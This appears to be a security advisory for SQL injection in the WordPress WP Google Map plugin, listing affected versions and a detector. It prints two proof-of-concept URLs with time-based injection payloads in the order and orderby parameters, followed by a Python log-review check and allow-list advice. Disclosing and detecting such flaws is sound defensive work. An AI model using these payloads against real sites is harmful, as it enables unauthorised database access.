WordPress Google Map Plugin Multiple SQL injection Vulnerabilities
BID:104962
Info
| Bugtraq ID: | 104962 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 12 2018 12:00AM |
| Updated: | Jun 12 2018 12:00AM |
| Credit: | Neven Biruski |
| Vulnerable: | WordPress WP Google Map 4.0.4, WordPress WP Google Map 4.0, WordPress WP Google Map 3.12, WordPress WP Google Map 3.0, WordPress WP Google Map 2.1 |
| Not Vulnerable: | |
Exploit / POC
The following URLs are available:
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=ascPROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
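A log-review check for the two parameters used in the URLs above, as an added example that is not part of the original advisory: it flags requests to the wpgmp_manage_location page whose order or orderby value is anything other than a sort direction or a bare column name. The function name, the identifier pattern and the sample URLs are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate request sorts by one bare column name and a direction.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
DIRECTIONS = {"asc", "desc"}
TARGET_PAGE = "wpgmp_manage_location"  # page slug taken from the advisory's URLs


def suspicious_sort_params(url):
    """Return the (param, value) pairs in `url` that fail strict validation.

    Every occurrence of a parameter is checked, because a request may repeat
    `order` or `orderby` and the application may read any one of them.
    """
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    if TARGET_PAGE not in query.get("page", []):
        return []
    bad = []
    for value in query.get("orderby", []):
        if not IDENT.fullmatch(value):
            bad.append(("orderby", value))
    for value in query.get("order", []):
        if value.lower() not in DIRECTIONS:
            bad.append(("order", value))
    return bad


BASE = "http://example.com/wp-admin/admin.php?page=wpgmp_manage_location"
SAMPLES = [  # constructed request URLs, not captured traffic
    BASE + "&orderby=location_address&order=asc",
    BASE + "&orderby=location_address&order=ascEXTRA(1)",
    BASE + "&order=asc&orderby=location_address%20AND%20(1)&order=asc",
    "http://example.com/wp-admin/admin.php?page=other_page&order=zzz",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        findings = suspicious_sort_params(sample)
        print("FLAG" if findings else "ok  ", sample, findings)
```

The same allow-list (a fixed set of directions and a known set of column names) is the usual server-side control for ORDER BY input, since identifiers and keywords cannot be bound as query parameters.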
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]